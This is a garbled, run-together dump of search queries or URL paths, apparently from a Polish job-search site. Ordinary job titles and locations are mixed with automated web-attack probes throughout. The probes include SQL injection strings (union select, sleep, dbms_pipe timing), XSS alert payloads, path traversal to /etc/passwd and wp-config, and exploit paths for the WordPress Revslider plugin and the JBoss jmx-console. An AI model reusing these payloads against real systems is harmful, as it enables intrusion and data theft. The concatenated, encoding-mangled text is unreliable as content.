angielskiwprowadzanie danychpracownik+produkcjimonter%2bpod%25c5%2582%25c3%25b3gprawnik j%25c4%2599zyk rosyjskitechnik+elektryk+%252528m/k%252529 kujawsko-pomorskienauczyciel+1-3 mazowieckiespecjalista+ds.+zakupówРабота с персоналом | Кадры kąty wrocławskieskładanie długopisówod zaraz lubelskiepraca%2bcha%c5%82upniczakoninbudownictwo | geodezja pomorskiekierowca++b świętokrzyskiekierownik+zespo%2525c5%252582u+programistycznegoasystent+klienta%25252c+konsultantmarketing+|+reklama+|+pr śląskiegastronomia | cateringopieka+nad+psemagencja pracy transfander radomskoin%c5%bcynier+procesu+spawaniamonter konstrukcji/wp-login.php%252527a%25253d0/wp-adminmagazynier podlaskiein%25c5%25bcynieria %257c projektowaniepracownik+biurowy szczecinpracownik administracyjno-biurowywarehouse/wp-login.php%27a%3d0%27a%3d0 tychypraca%252525252b%252525252bfizyczna%252525252bbez%252525252bj%252525252525c4%25252525252599zyka niemcyp%252525c5%25252582atnos+cijęzyka+hiszpańskiego warszawamagazynier+%2c+budowlankaprzemys%c5%82+%7c+produkcja wielkopolskiemonta%25252525c5%25252525bc+instalacji+elektrycznychwarehouse/wp-login.php%252525252527a%25252525253d0%252525252527a%25252525253d0location%25252525253dtychy%252525252522 or %252525pracownik+fizycznapracownik sekretariatu szczecinkierowca++kat+c%25%27+union+all+select+null%2cnull%2cnull--+tdolmanager sprzeda%c5%bcyasystent in%2525c5%2525bcynierabadania i rozw%252525c3%252525b3j szczecintransport+%2525257c+spedycja'||sleep(3)&&'1praca%25252bdla%25252bparradomspecjalista+ds.+kadr+i+p%2525252525c5%252525252582ac+%252525252528m/k%252525252529cie%c5%9bla+szalunkowy francjapracownik%2bdzia%2525c5%252582u%2bw%2525c4%252599dliny/seryspecjalista%2bds%2bksi%c4%99gowo%c5%9bcipraca%2bfizyczna%2bsprz%252525c4%25252585taczkagrodzisk wielkopolskipakowanie+żywnościkierowca++kat+c%2525%2527%253bselect+dbms_pipe.receive_message%2528chr%2528103%2529%257c%257cchr%252880%2529%257c%257cchr%252890tłumacz rosyjskiego warszawaprzemys%2525c5%252582 %25257c produkcja lubelskiemonter konstrukcji/wp-login.php%252527a%25253d0/07545460.php and 1%25253d1%252527a%25253d0kierowca kat.b warszawarudaserwisoperator wózka widłowego'a=0 łódzkiemonter konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extractoperator w%c3%b3zka wid%c5%82owego warszawaczechowice-dziedzicemonter konstrukcji/wp.../wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%3ffilename%3d../../../../wp-configmagazynier%2b%252525252c%2bbudowlankapraca+biurowa,+ochronaspecjalista ds. kadr i płacks serviceprzemys%25c5%2582+%257c+produkcja warszawatechnik elektryk %252528m/k%252529 warszawapracownik produkcji łódzkieniebylecpraca%252bbiurowa%252bz%252bobs%252525c5%25252582ug%252525c4%25252585%252bklientaadministracja+biurowa śląskiespecjalista+ds.+obs%c5%82ugi+klientasupply chain warszawapomocnik kierowcy polskapraca+ochrona wielkopolskiejakościpracownik%2bobszaru%2bprodukcji%2b%25252528m/k%25252529logistyka %7c dystrybucja legnicakierowca c+e kujawskokomponenty maszyn podkarpackiehr, kadry'a=0inżynieria+|+projektowanieaaaaaaaarolnictwomonter%2bbateri%2bprzemys%25c5%2582owychprzemysł | produkcja grójecpraca%2bpomoc%2bksi%c4%99gowej wielkopolskiesprzatanie+w+biurowcu lublinfrancuski rekrutacja warszawadoradca%252bklientads.%252bszycia%252bna%252bmiar%252525c4%25252599kontrola%252bjako%25c5%259bciorzeczeniemechanik samochodowy poznańkonstruktor+oprzyrządowaniaenergetyka+%257c+elektronika warszawa%d0%9f%d0%bb%d0%b8%d1%82%d0%be%d1%87%d0%bd%d0%b8%d0%bakierowca kat.bkierowca%25252bw%25252bwypo%2525252525c5%2525252525bcyczalni%25252bsamochodowej%25252b%252525252528m%2fk%252525252529międzybrodzieŚroda wielkopolskaохранаmonter konstrukcji/wp-login.php'a=0/wp-admin/wp-admin/admin-ajax.php?action=revslider_show_imagemagazynier%2525252525252cprodukcja%2525252525252ckierowca kat.b mazowieckie%25d0%25b2%25d0%25be%25d0%25b4%25d0%25b8%25d1%2582%25d0%25b5%25d0%25bb%25d1%258c+%25d0%25ba%25d0%25b0%25d1%2582%25d0%25b5%25d0%2nauczyciel+j%252525c4%25252599zyk+francuskimonter konstrukcji/wp-login.php%2527a%253d0/07545460.php and 1%253d1%2527a%253d0operator w%25c3%25b3zka wid%25c5%2582owego %25e2%2580%2593 2 zmiany%252c bez do%25c5%259bwiadczeniadyrektor artystycznysprzedaż | obsługa klienta sochaczewmagazynier%2cprodukcja%2ckierowca kat.b warszawaze %252525252525c5%2525252525259brednim wykszta%252525252525c5%25252525252582ceniemводительpomoc+w+tłumaczeniach warszawaorzyszryczówtechnik+weterynarii poznańmagazynier - nie wymagamy do%25c5%259bwiadczeniamedycyna+%257c+opieka+zdrowotna warszawapracownik%2bbetoniarzpracownik+do+wyk%252525c5%25252582adania+towaruprzemys%2525252525c5%252525252582 %25252525257c produkcja pomorskiein%c5%bcynier+elektronik+%28m/k%29 lublinkierowca++kat+c'+union+all+select+null,null,null,null--+qpccsap%2525252527a%252525253d0magazynier%2525252525252cprodukcja%2525252525252ckierowca%2520kat.b mazowieckieexcelpracownik+fizyczna zgierz,kontrola+jako%25c5%259bcidoradca%2bklientaprudnikpraca fizyczna bez językaasystent/ka+ds.+księgowosci poznańw%25c3%25b3zki%252bwid%25c5%2582owerekrutacja pracownik%c3%b3wprzemysł | produkcja małopolskiekierowca%2bb%2bbes%2bznajosci%2bjenzyka niemcybadania%25252bi%25252brozw%2525252525c3%2525252525b3jinżynier produkcjitechnik elektryk %252528m/k%252529 pomorskiein%252525c5%252525bcynier budowy/wp-login.phppraca fizyczna bez j%252525252525c4%25252525252599zyka niemcyoperator%2bw%c3%b3zk%c3%b3w%2bwid%c5%82owychbudownictwo | geodezja warszawapracownik+administracyjno-biurowy warszawatester+gier+komputerowychj%2525252525c4%252525252599zyk%2bw%2525252525c5%252525252582oskipracownik%252bprodukcji-bez-jezyka-niemieckiego niemcyprawnik+j%25c4%2599zyk+rosyjskiprace manualne warszawat%c5%82umacz ukrai%c5%84skiegotransport%252b%25257c%252bspedycjamonter konstrukcji/wp-login.php'a=0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php?action=revslider_shin%25c5%25bcynier+elektronik+%2528m/k%2529 lubelskiekierowca+w+wypo%2525c5%2525bcyczalni+samochodowej+%252528m%25252fk%252529ślusarzgastronomia+%2525257c+cateringprzemys%2525c5%252582+%25257c+produkcja wielkopolskietutor of englishprzemys%c5%82+%7c+produkcja pomorskiemechanik wielka brytaniapracownik%2bbiurowyaaaaaaaasprzataczka w szkole' and 'x'='xtechnik+serwisuprzemys%252525c5%25252582 %2525257c produkcja szczecinsocial+mediajęzyk francuskinauczyciel j%2525252525c4%252525252599zyk francuskiadministracja biurowa%2527a%253d0operator+wózka+widlowego wrocławpraca+w+ochronie+na+obiektach+handlowych+-+biedronkainformatyka programowanie helpdeskdoradca%2bfinansowyoperator%252bw%252525c3%252525b3zka%252bwid%252525c5%25252582owegokierowca++kat+c+union+all+select+null,null,null,null,null,null--+sgqzkopiowanie%25252c+skanowaniemonter+konstrukcji/wp-login.php%27a%3d0/07545460.phpmonter konstrukcji/wp-login.php'a=0/07545460.php and 1>1sieradzsoftware pro řízení firmy | služby google pro firmy – google'a=0sprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klienta pomorskiewsparcie rekrutacji poznańj%c4%99zyk+francuski warszawapracownik%2bna%2bfarmie%2bmlecznejmagazynier+%252528m/k%252529project+manager wrocławin%2525c5%2525bcynieria%252b%25257c%252bprojektowanie podkarpackiebezpłatne+kursy+i+szkoleniasprzedaż krakówmonter konstrukcji/xmlrpc.php%27a%3d0%27a%3d0junior+turkishspecjalista+ds.+planowania+dostawhr%252c%252bkadry mazowieckiepraca%252bfizyczna%252bsprz%25252525c4%2525252585taczkatrzebinianowaopiekunka do os%c3%b3b starszych w niemczech bez j%c4%99zykamonter+p%252525c5%25252582ytmłodszykierowca+w%25252525c3%25252525b3zka+wid%25252525c5%2525252582owegopracownik+magazynowy+(m/k)pracownik%2bszklarni%2bz%2br%2525c3%2525b3%2525c5%2525bcamilower silesian voivodeshipsprzedawca%2c niania%2c operatorka linii produkcyjnej polandredaktor+treści+psychologicznych poznańspecjalista ds. obs%2525252525c5%252525252582ugi klientapracownik%2bprodukcyjno%2b-%2bmagazynowyprzemysł+|+produkcja belgiaasystent+klienta%252c+konsultanttransport%2b%7c%2bspedycja mazowieckiepraca w magazynie niemcy bez znajomo%25252525c5%252525259bci j%25252525c4%2525252599zykaspawacz+zbrojeńsekretarka ze znajomo%25c5%259bci%25c4%2585 j. niemieckiegosprzedaż+|+obsługa+klienta lubelskietransport %7c spedycja and 1%3e1in%c5%bcynier elektronik %28m/k%29 lubelskietransport%2b%25257c%2bspedycja%252522%2band%2b%252522x%252522%25253d%252522y%252527a%25253d0operator+żurawia+wieżowegomedia %257c sztuka %257c rozrywkautrzymanie ruchuco2 laser opratorin%2525252525c5%2525252525bcynieria %25252525257c projektowanie podkarpackiekierowca %252528m/k%252529 %252528kat. c%25252be%25252c hakowce%252529kurs na w%25c3%25b3zek wid%25c5%2582owysprz%c4%85taczka+w+szkolenetworkpraca fizyczna świdnicamalarzmedycyna | opieka zdrowotna szwajcariaprzemysł | produkcja błoniemonter+konstrukcji/wp-login.php%2527a%253d0/07545460.php+or+%25281%252c2%2529%253d%2528select%252afrom%2528sel'a=0in%2525c5%2525bcynier elektronik %252528m/k%252529specjalista%252bds%252bkadr%252bi%252bp%2525c5%252582acspecjalista ds hrspecjalista+ds.+kadr+i+p%c5%82ac+%28m/k%29in%25c5%25bcynier+mechanikpraca%2bdla%2bpa%2525c5%252584%2bi%2bpan%2525c3%2525b3win%2525c5%2525bcynier %2525c5%25259brodowiskakompetacja zamówień pruszkówwarehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0location%2525253dtychy and 1%2525253e1mechanik+przemysłowy mielecpracownik magazynowy (m/k) warszawakomorówbiuro administracja ksi%c4%99gowo%c5%9b%c4%87 j%c4%99zyki warszawatrzebielkonstancin -jeziornapraktykant/ka+hrmonter konstrukcji/wp-login.php'a=0/894613256498.phpspedytor warszawamonter+konstrukcji/wp-login.php'a=0'a=0magazynier%2b%25252c%2bpakowaczoperator wózka widłowego łódzkiedoradca techniczny %2525252528komponenty maszyn%2525252529praca%2bbez%2bznajomo%252525252525c5%2525252525259bci%2bj%252525252525c4%25252525252599zyka niemcyspecjalista ds. kadr i p%252525252525c5%25252525252582ac %25252525252528m/k%25252525252529korwek marcin f. h.u. eko-tech solki rajgród bargłów kościelny.kierowca%2bw%2bwypo%252525c5%252525bcyczalni%2bsamochodowej%2b%25252528m/k%25252529human+resources+%257c+kadry wielkopolskiemagazynier wielkopolskatransport+|+spedycja"+and+"x"="y tychyadministracja+biurowa Łódźenergetyka krakÓwserwis+|+technika+|+montaż łódźkonsultant ds. wdro%2525c5%2525bce%2525c5%252584badania%252bi%252brozw%25252525c3%25252525b3joperator+w%252525c3%252525b3zkapracownik obszaru produkcji %252528m/k%252529szukam+pracy poznańkostrzyn+nad+odrąbez znajomo%25c5%259bci j%25c4%2599zykat%25252525c5%2525252582umacz j%25252525c4%2525252599zyka migowegokierowca w wypożyczalni samochodowej (m/k) gdańsktelepraca dla onochrona+innemonter%252525255c+pakowaczmechanik samochodowypracownik obs%25c5%2582gi lotniskaoperator%252bw%25252525c3%25252525b3zk%25252525c3%25252525b3w%252bwid%25252525c5%2525252582owych polskalektor+języka+niemieckiegomonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1%27%3e%pomoc+biurowa krakówprodukcja dla niepełnosprawnych%' union all select null#sprzataczka+w+szkole sosnowiecmechanik%2bsamochodowy%2bkierowcamonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1'><script>alert('mysqlerrmonter%25252fka+element%2525c3%2525b3w+do+siedze%2525c5%252584+samochodowych niemcyin%c5%bcynier jako%c5%9bcipracownik magazynu od zaraz łódzkieszczecinekkontrola+jako%2525252525c5%25252525259bciinformatyka administracja radommonter%2fka+element%2525c3%2525b3w+do+siedze%2525c5%252584+samochodowychkonsultant ds. obs%2525c5%252582ug klienta niemieckoj%2525c4%252599zycznego-1260+union+all+select+14,14,14,14,14,concat(concat('qqzpq','gacbylpufr'),'qbbvq'),14--+kpixpracownik szklarni z og%c3%b3rkamidla%2buczniaoperator %25252525c5%2525252582adowarkitransport%25252b%252525257c%25252bspedycjahuman resources | kadry krakówspecjalista+ds.+kadr+i+p%2525c5%252582ac+%252528m/k%252529nauczyciel angielskiego%2c chinskogorekrutacjafinanse+|+bankowość warszawatechnik konsultant %25252525252528m/k%25252525252529pracownik+dzia%25c5%2582u+obs%25c5%2582ugi+klienta warszawakatowicerekrutacja+pracownik%25c3%25b3wpraca+fizyczna kielceustawiacz+maszyn+produkcyjnych+-+nie+wymagamy+do%c5%9bwiadczenialogistyka | dystrybucjathe interface | tour | idesktop.tvpracownik+biurowyaaaaaaaapracownik+budowlanki legnicamonter konstrukcji/wp-login.php%3cbodyonload%3dalert%28%27mysqlerror%27%29%3e%27a%3d0transport+%252525257c+spedycja%2525252527a%252525253d0%2525252527a%252525253d0warehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy and 1%3e1in%252525c5%252525bcynier %252525c5%2525259brodowiskapraca+dla+ucznia+wakacje krakówpracownik produkcji %25252528m%2fk%25252529mechanik przemys%25c5%2582owy%252f monterkierowca w%252525c3%252525b3zka wid%252525c5%25252582owegobolesławgrafik warszawagermanpracownik%2bszklarni%2bz%2br%252525c3%252525b3%252525c5%252525bcamielektronik+(m/k)+w+zespole+reklamacji wrocławsiewierzmagazynier%20w%25c3%25b3zkowy/etc/passwd%27 union all select null%2cnull-- eewypomoc+w+przedszkolu wrocławpracownik+inwentaryzacji+za+granicąspecjalista%2bds.ksi%c4%99gowo%c5%9bcipraca%252bzakwaterowaniem%27a%3d0transport+%2525257c+spedycja%25252527a%2525253d0%25252527a%2525253d0praca+b poznańpraca zdalna śląskiemonter+pod%c5%82%c3%b3g niemcytechnik dentystyczny lubelskiepracownik%2bszklarni%2bz%2bog%c3%b3rkamimagazynier z uprawieniami na w%c3%b3zki wid%c5%82owemonter+konstrukcji/wp-login.php<scr<script>ipt>alert(/mysqlerror/)</scr</script>ipt>kierowca%252bc%252be niemcypracownik%2bprodukcji%2b-%2bnie%2bwymagamy%2bdo%2525c5%25259bwiadczeniapracownik+produkcji policeadsense+help+forum+-+google+product+forums+essay+topicsinternet+%7c+e-commerce%27a%3d0'a=0praca+emeryt tarnowskie+górytransport %25257c spedycja and 1>1nauczyciel j%252525c4%25252599zyk niemiecki/login.action/jmx-console/web-console/invokerobs%25252525c5%2525252582uga+klientaczarny bórgastronomia %7c catering warszawaślusarz spawacz śląskiespecjalista+ds+kar+i+p%25c5%2582ac%2527a%253d0administracja biurowapraca+pomoc+księgowej wielkopolskiefinanse %25257c bankowo%2525c5%25259b%2525c4%252587pracownik produkcji - praca od zarazpraca+national+geographic+education+-+national+geographic+society+|+szybkopraca.plrolnictwo | ochrona środowiska warszawamagazynier (m/k) opolekierowca++kat+c+union+all+select+14,14,14,14,14,concat(concat('qqzpq','jqfsnwtyee'),'qbbvq'),14--+ljaupracownik powierzchni sprzeda%25c5%25bc%25c4%2585administracja perosnalna warszawamonter%2bkonstrukcji/wp-login.php%3cbodybackground%3d%22javascript%3aalert%28%27mysqlerror%27%29%22%3e%27a%3d0magazynier/operator%2bw%25c3%25b3zka%2bwid%25c5%2582owego%2b%2528m/k%2529konsultant ds. obs%25c5%2582ug klienta niemieckoj%25c4%2599zycznego warszawawarehouse/wp-login.php%27a%3d0%27a%3d0 and 1>1monter konstrukcji/wp-login.php%22%3ehead%3cscript%3ealert%28%27mysqlerror%27%29%3c/script%3ehead%22%3edoradca+klienta,+pracownik+biurowy,administracjabhp przedstawiciel handlowypracownik+biurowy+z+językiem+francuskim+-+praca+zdalnakierowca+c%252be+lub+c1praca biurowa z obs%2525c5%252582ug%2525c4%252585 klientain%2525c5%2525bcynier+budowycvopiekunka+do+dzieckaspecjalista ds. jako%2525c5%25259bcipraca pracownicy wykonujący prace prostesekretarka ze znajomo%2525c5%25259bci%2525c4%252585monter+konstrukcji/wp-login.php%2525252527a%252525253d0/wp-admin/admin-ajax.php%252525253faction%252525253drevslider_smonter kadłubówinżynieria+|+projektowanie śląskierejestratorka medycznabiuro+administracja+ksi%2525c4%252599gowo%2525c5%25259b%2525c4%252587+j%2525c4%252599zyki warszawapracownik księgarnim%25c5%2582odszy specjalista ds. kadr i p%25c5%2582acpracownik do sortowania owoc%25252525c3%25252525b3w holandiakierowca kat b c1111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45) -- warszawaasystent+stomatologa mazowieckietechnolo konstrukcji/enterso.info/wp-login.phppraca tymczasowa'kierownik budowy pomorskiepraca+pomoc+księgowej gdańskradzionkówkierownik regionalny mazowieckiepraca%2525252bfizyczna%2525252bspawacz niemcyasystent/ka+ds.+administracji+i+obs%252525c5%25252582ugi+klienta+ze+znajomo%252525c5%2525259bci%252525c4%25252585+j%252525c4%252magazynowy %2528m/k%2529 warszawakadry+i+p%2525c5%252582acepracownik+gospodarczy wielkopolskiekierowca+b++c+esekretarka ze znajomo%2525c5%25259bci%2525c4%252585 j. rosyjskiegojunior+marketing krakówkierowca wywrotkiin%25c5%25bcynier+jako%25c5%259bcipraca%25252bzdalnaбухгалтерzakupykorwek%2bmarcin%2bf.%2bh.u.%2beko-tech%2bsolki%2brajgr%252525c3%252525b3d%2bbarg%252525c5%25252582%252525c3%252525b3w%2bko%25252pomoc księgowa warszawawarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy+or+%2525281%25252c2%252529%25253d%252528select%25252aaccount/etc/passwd order by 1-- gsfukierowca++kat+c+eopieka nad psem%27a%3d0konsultant+j%25c4%2599zyk+angielskioperator+w%25c3%25b3zkapracownik produkcyjny %28m/k%29 gliwicepracownik socjalnyzakupy warszawapracownik+produkcji+-+bezpłatny+dowóz+do+miejsca+pracy!praca%2bca%2525c5%252582y%2betatspecjalista+dshrc%25252523pracownik%252bmonta%252525c5%252525bcupracownik monta%25c5%25bcu %2528m/k%2529 sosnowiecin%25c5%25bcynieria+%257c+projektowanieaaaaaaaakierowca %28m/k%29 %28kat. c%2be%2c hakowce%29 warszawadzia%25252525c5%2525252582 obs%25252525c5%2525252582ugi klientapraca dla studenta lublinzakup%25c3%25b3wkierowca w wypo%252525c5%252525bcyczalni samochodowej %25252528m/k%25252529 niemcyspecjalista%2bds.%2bkadr%2bi%2bp%25252525c5%2525252582ac%2b%2525252528m/k%2525252529logistyka%2b%7c%2bdystrybucjaaaaaaaaadoradca+medyczny warszawatransport %2525257c spedycja or (1,2)=(select*from(select name_const(char(118,119,71,122,80,103,104,118,87),1),name_const(char(1 grodzisk mazowieckim%c5%82odszy+konsultant+ds.+rekrutacji+%28m/k%29a pilot project for a new libertarian floating city will have 300 homes%2c its own government%2c and its own cryptocurrencylider+w+dziale+produktów+dużej+konsumpcjipracownik%2bmagazynowy%2b-%2batrakcyjna%2bstawka%2bi%2bbezp%25c5%2582atny%2bdojazdopiekunka+do+dziecka lublinoperator w%c3%b3zka wid%c5%82owego - 20%2c23 z%c5%82/godz. brutto plus premiafakturytechnik elektryk (m/k) kąty wrocławskiepracownik%2brestauracji%2b-%2belastyczne%2bgodziny%2bpracy%2521pracownik+monta%c5%bcu+%28m/k%29 katowicewarehouse/wp-login.php%27a%3d0%27a%3d0' and 'x'='ybadania%2bi%2brozw%25252525c3%25252525b3jaaaaaaaakierowca++kat+c%'+union+all+select+null--+lmxvbarczewomonter+konstrukcji/wp-login.php%252527a%25253d0/wp-admin/specjalista+ds.+sprzeda%2525252525c5%2525252525bcy+produkt%2525252525c3%2525252525b3w+bankowychgastronomia+%7c+cateringkujawsko-pomorskiemedycyna+%252525257c+opieka+zdrowotnacomputer programming polandlekarzbadania%2bi%2brozw%252525c3%252525b3jaaaaaaaaspecjalista ds kar i p%c5%82ac%27a%3d0%27a%3d0%27pomoc%2bksi%25252525c4%2525252599gowapracownik mapraca+fizyczna+dorywcza warszawarozne+stanowiska polskaoperator%252525252bw%252525252525c3%252525252525b3zk%252525252525c3%252525252525b3w%252525252bwid%252525252525c5%25252525252582opraca+fizyczna czechowice-dziedzicestarszy inspektor bhpin%2525252525c5%2525252525bcynier mechanikprodukcja dla niepełnosprawnych union all select null,null,null,null,concat(0x7170627871,0x6a7764417159564d556e,0x717a786a71),noperator w%25252525c3%25252525b3zka wid%25252525c5%2525252582owego wielkopolskiein%2525c5%2525bcynier+elektronik+%252528m/k%252529 lublinspecjalista ds. sprzeda%c5%bcy warszawaochrona katowicepracownik%25252bprodukcji%25252b%25252525252528m/k%25252525252529ksi%25c4%2599gowo%25c5%259b%25c4%2587 %257c audyt %257c podatkiaaaaaaaapracownik ochrony fizycznej z kwalifikacj%25c4%2585operator+koparki śląskiemonter konstrukcji/wp-login.php'a=0/07545460.php/license.phpadministrator it chełmadecco lublinprodukcja dla niepełnosprawnych%' union all select null,null,null,null,null,null#angielski hiszpa%252525c5%25252584skipracownik%2bdzia%2525252525c5%252525252582u%2bhroffice%2bassistant polandwarehouse/wp-login.php'a=0'a=0 tychyoperator wózka widłowego - 20,23 zł/godz. brutto plus premiakierowca %2528m%2fk%2529 %2528kat. c e%252c hakowce%2529produkcja%2bdla%2b%2bniepe%2525c5%252582nosprawnychkoordynator+w+zak%25c5%2582adzie+produkcjiproject+manager wielkopolskieunited+kingdomspecjalista+ds+kar+i+p%252525c5%25252582ac wielkopolskiereach+truckpraca%2bzakwaterowaniem'a=0office managermysiadłoin%2525252525c5%2525252525bcynier jako%2525252525c5%25252525259bcinauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/jmx-console/htmladaptor%3faction%3dinspectmbeanpracownik ochrony zabrzeinżynieria | projektowanie Łódźkierowca c%2be niemcycie%252525c5%2525259bla%252bszalunkowyopiekun+klienta+poszukiwany!!!+|+szybkopraca.plspcjalista+ds+inwentaryzacjikierowca%20%252528m/k%252529%20%252528kat.%20c%25252be%25252c%20hakowce%252529praca%252525252bbez%252525252bznajomo%252525252525252525c5%2525252525252525259bci%252525252bj%252525252525252525c4%2525252525252 niemcybudownictwo%2525252525252b%252525252525257c%2525252525252bgeodezjamechanik+silnik%2525c3%2525b3w+lotniczychoperator+prasy+krawedziowejpraca%2bw%2bholandii szczecinhr łódzkiemonta%2525c5%2525bcysta stela%2525c5%2525bcy meblowych%25252525c5%252525259blusarz+spawaczdoradca+klienta, krakówcustomer+service+specialist+with+turkish warszawaspecjalista ds. logistykiin%25c5%25bcynier budownictwatechnolo konstrukcji/wp-login.php%252527a%25253d0specjalista ds. kadr i płac wielkopolskiestaszówtransport %2525257c spedycja mazowieckieprzemysł | produkcja bielsko-bialatechnik elektryk %25252528m/k%25252529 polskakierowca kat c%25%27 union all select null%2cnull%2cnull-- tdolmechanik%252525252c+operator+maszyntechnolog+przetw%c3%b3rstwa+tworzywserwis %7c technika %7c monta%c5%bc lublinkierowca+w+wypo%2525c5%2525bcyczalni+samochodowej+%252528m%2fk%252529 niemcyspecjalista ostrów+wielkopolskij%25c4%2599zyk rosyjskiparacownik+myjniwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%22 and %22x%22%3d%22xnauczyciel język niemiecki/login.action/web-console/admin-console/login.seam/admin-console/github.com/joaomatosf/jexbossz%252borzeczeniembłonieoperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego wielkopolskiesprzataczka+biurowa warszawapracownik magazynu praca dodatkowaspecjalista%2bds.%2bkadr%2bi%2brekrutacji%2b%28m/k%29referent ds kadr poznańkontroler jakości (m/k) śląskieprace biurowekierownik+gospodarstwabadania%2bi%2brozw%c3%b3jwpisywanie danych do bazy warszawamonter konstrukcji/wp-login.php%2527a%253d0/license.php'a=0wszystkiemarking laser opratorpraca na produkcji kąty wrocławskienauczyciel j%2525c4%252599zyk niemiecki/login.action/web-console/invokermonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1' andprzemysł | produkcja belgiasign in - google accountsniepe%c5%82ny etat warszawaksięgowa płockkontroler jako%25252525c5%252525259bci %2525252528m/k%2525252529key account warszawaprzemys%25c5%2582 %257c produkcja katowiceadministrator sieci holandiajęzyk włoski warszawalogistics%2bmanager polskamłodszy+konsultant+ds.+rekrutacji+(m/k)podwykonawca+p%25c5%2582ytky+g%25c5%2582adzie+malowaniekonstruktor odziezypraca%252bfizyczna%252bsprz%2525c4%252585taczkapracownik+monta%25c5%25bcu bytomprodukcja+lek%2525252525c3%2525252525b3wmonter+konstrukcji%2fwp-login.php%2527a%253d0%2f07545460.php+and+1%253d1%2527a%253d0opiekunka osób starszych belgiapraca%2bpracownicy%2bwykonuj%252525c4%25252585cy%2bprace%2bprostemedycyna+%257c+opieka+zdrowotna opolskiemarketing+|+reklama+|+praaaaaaaain%2525c5%2525bcynier elektronik %252528m%252fk%252529praca%2bpomoc%2bksi%252525252525c4%25252525252599gowejoperator+wózków+widłowych szczecinstare babice1/2 warszawakierowca kat c%27%3bselect dbms_pipe.receive_message%28chr%28103%29%7c%7cchr%2880%29%7c%7cchr%2890%29%7c%7cchr%2876%29%2c5%29 fspecjalista%2bds%2bkadr%2bi%2bp%c5%82acksięgowość+|+audyt+|+podatki warszawaasystent/ka+ds.+administracji+i+obs%c5%82ugi+klienta+ze+znajomo%c5%9bci%c4%85+j%c4%99zyka+ruskiegopraca fizyczna spawacz gdańsktransport %257c spedycja2121121121212.1sprzeda%c5%bc+%7c+obs%c5%82uga+klienta rybnikexcel śląskiedoradca%2bds%2bnieruchomo%25c5%259bcitransport %7c spedycja mazowieckiemontażysta stelaży meblowychtransport+%25257c+spedycjalogistyka | dystrybucja pruszkówpracownik produkcji %e2%80%93 nie wymagamy do%c5%9bwiadczeniaspecjalista+ds.+zakup%252525c3%252525b3w../../../../../../etc/passwd wrocławmechanik silników lotniczychrekrutacja+pracownikówksi%c4%99gowo%c5%9b%c4%87 %7c audyt %7c podatkiaaaaaaaaca%2525c5%252582a+polskakierowca+kat+c+e warszawasprzeda%25c5%25bc %257c obs%25c5%2582uga klienta radomrecepcjonista/kakierownik produkcji olsztynpracownik%252bobszaru%252bprodukcji%252b%2528m/k%2529portier -pracowni ochrony toruńkierowca w wypo%2525c5%2525bcyczalni samochodowej %252528m%25252fk%252529kierowca %2528m%2fk%2529 %2528kat. c%252be%252c hakowce%2529 niemcyspecjalista+dshr warszawapracownik sklepu odzie%2525c5%2525bcowego %252528m/k%252529specjalista%2bds.%2bkadr%2bi%2bp%252525c5%25252582ac%2b%25252528m/k%25252529konsultant+%25c5%259blubnymonter p%c5%82yt gkkierowca++kat+c%25%27+order+by+6066--+mnacprzemys%2525c5%252582+%25257c+produkcja niemcypracownik+produkcji-bez-jezyka-niemieckiegopracownik%2bprodukcji%2b-%2bbezp%25c5%2582atny%2bdow%25c3%25b3z%2bdo%2bmiejsca%2bpracy%2521budownictwo%25252b%25252525252525257c%25252bgeodezjadoradca ds. kredytów oświęcimkierowca kat c%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- kcgwkościelecbudownictwo%2b%7c%2bgeodezjamyślibórzpracownik+ochrony warszawa'in%252525252525c5%252525252525bcynieria %2525252525257c projektowaniein%25c5%25bcynier elektronik %2528m/k%2529 lubelskieołtarzewwinnicakierowca %25252528m/k%25252529 %25252528kat. c%2525252be%2525252c hakowce%25252529hr,+kadry'a=0magazynier %25252c pakowaczoperator+maszyn+produkcyjnychbudownictwo+%257c+geodezja warszawamonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_imagepracownik obszaru produkcji %2528m/k%2529 czechowice dziedziceoperator%252bw%2525c3%2525b3zk%2525c3%2525b3w%252bwid%2525c5%252582owych polskaspecjalista ds turystyki warszawalogistyka+|+dystrybucja warszawa*biuro administracja ksi%25c4%2599gowo%25c5%259b%25c4%2587 j%25c4%2599zyki warszawababoszewospecjalista+wdro%c5%bcenia+platformyoperator+w%252525c3%252525b3zk%252525c3%252525b3w+wid%252525c5%25252582owych szczecinbukprodukcja dla niepełnosprawnych;select sleep(5)#pracownik+produkcji kołomagazynier/ka%e2%80%93+stawka+18%2c50+z%c5%82/brutto+premia%21praca+pomoc+ksi%c4%99gowejspawacz niemcyasystent/ka ds. ksi%2525c4%252599gowoscioperator %2525c5%252582adowarkispecjalista ds kadr i płac poznańprzemysł | produkcja gdańskpracownik+myjni+samochodowej+%28m/k%29transport%2b%252525257c%2bspedycja%25252522%2band%2b%25252522x%25252522%2525253d%25252522ykierowca+w+wypo%c5%bcyczalni+samochodowejtransport | spedycja' and 'x'='xbadania+i+rozw%c3%b3jpracownik+betoniarz warszawawejherowoŁukówpraca dla niepełnosprawnychcieślamechanik samochodowy niemcymagazyn+-+praca+od+zaraz%2c+17%2c50+z%c5%82/godzin%c4%99+%2b+premie+i+inne+korzy%c5%9bci%21kontrola+jako%2525c5%25259bci mazowieckiewarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy%252527nauczyciel j%c4%99zyk niemiecki/login.action/web-console/admin-console/login.seam/admin-console/obs%252525c5%25252582uga+klienta 